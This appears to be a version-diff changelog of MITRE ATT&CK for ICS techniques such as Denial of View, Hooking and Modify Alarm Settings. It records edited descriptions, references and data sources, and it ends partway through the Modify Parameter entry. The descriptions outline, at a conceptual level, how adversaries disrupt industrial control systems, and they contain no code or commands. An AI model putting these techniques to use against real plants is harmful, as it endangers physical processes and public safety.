x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Process: OS API Execution | Application Log: Application Log Content
x_mitre_version | 1.1 | 1.2
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Command: Command Execution | 
x_mitre_data_sources | Process: Process Creation | 
x_mitre_data_sources | Script: Script Execution | 
x_mitre_data_sources | File: File Access | 
x_mitre_data_sources | Application Log: Application Log Content | 
x_mitre_platforms | Control Server | 
x_mitre_platforms | Engineering Workstation | 
x_mitre_platforms | Human-Machine Interface | 

[T0813] Denial of Control

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)

New Description
Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 18:09:55.792000+00:00 | 2023-03-30 20:15:14.260000+00:00
description | Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017) | Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)
kill_chain_phases[0]['phase_name'] | impact-ics | impact
external_references[3]['source_name'] | Marshall Abrams July 2008 | Michael J. Assante and Robert M. Lee
external_references[3]['description'] | Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[3]['url'] | https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
external_references[4]['source_name'] | Michael J. Assante and Robert M. Lee | Tyson Macaulay
external_references[4]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04
external_references[4]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'} | 

[T0814] Denial of Service

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) In the Maroochy Shire attack, the adversary shut an investigator out of the network.(Citation: Marshall Abrams July 2008)

New Description
Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 18:17:08.160000+00:00 | 2023-03-30 20:16:01.922000+00:00
description | Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) In the Maroochy Shire attack, the adversary shut an investigator out of the network.(Citation: Marshall Abrams July 2008) | Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018)
external_references[4]['source_name'] | Marshall Abrams July 2008 | MITRE March 2018
external_references[4]['description'] | Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 | MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14
external_references[4]['url'] | https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf | https://nvd.nist.gov/vuln/detail/CVE-2015-5374
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | | Network Traffic: Network Traffic Flow
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'MITRE March 2018', 'description': 'MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-5374'} | 
x_mitre_data_sources | Network Traffic: Network Traffic Flow | 

[T0815] Denial of View

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008)

New Description
Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner.
Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 18:08:38.480000+00:00 | 2023-03-30 20:16:25.031000+00:00
description | Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008) | Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner.
kill_chain_phases[0]['phase_name'] | impact-ics | impact
external_references[2]['source_name'] | Marshall Abrams July 2008 | Michael J. Assante and Robert M. Lee
external_references[2]['description'] | Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[2]['url'] | https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
external_references[3]['source_name'] | Michael J. Assante and Robert M. Lee | Tyson Macaulay
external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04
external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'} | 

[T0822] External Remote Services

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) In the Maroochy Shire attack, the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008)

New Description
Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 18:07:53.764000+00:00 | 2023-03-30 20:16:55.602000+00:00
description | Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) In the Maroochy Shire attack, the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008) | Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow
x_mitre_version | 1.0 | 1.1
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'} | 

[T0874] Hooking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)

New Description
Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 15:40:42.017000+00:00 | 2023-03-13 13:32:08.619000+00:00
description | Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) | Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
kill_chain_phases[0]['phase_name'] | execution-ics | execution
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Process: OS API Execution | Process: Process Metadata
x_mitre_data_sources[1] | Process: Process Metadata | Process: OS API Execution
x_mitre_version | 1.1 | 1.2

[T0838] Modify Alarm Settings

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes.

If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](http://attacksite.mitre.org/tactics/TA0105/) could occur.

In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019)

Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code.

In the Maroochy Shire attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.(Citation: Marshall Abrams July 2008)

New Description:

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes.

If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur.

In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019)

Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code.
Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 18:14:48.212000+00:00 → 2023-03-30 20:17:43.803000+00:00
description:
  Old value: Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](http://attacksite.mitre.org/tactics/TA0105/) could occur. In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.(Citation: Marshall Abrams July 2008)
  New value: Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred.
  These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code.
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[2]: Network Traffic: Network Traffic Content → Asset: Asset Inventory
x_mitre_data_sources[3]: Asset: Asset Inventory → Network Traffic: Network Traffic Content
x_mitre_version: 1.1 → 1.2
iterable_item_removed
STIX Field: Removed value
external_references: {'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0836] Modify Parameter

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor.

An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.

In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)

New Description:

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor.

An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.

New Mitigations:

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 18:13:48.146000+00:00 → 2023-04-05 14:15:29.756000+00:00
description:
  Old value: Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)
  New value: Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor.
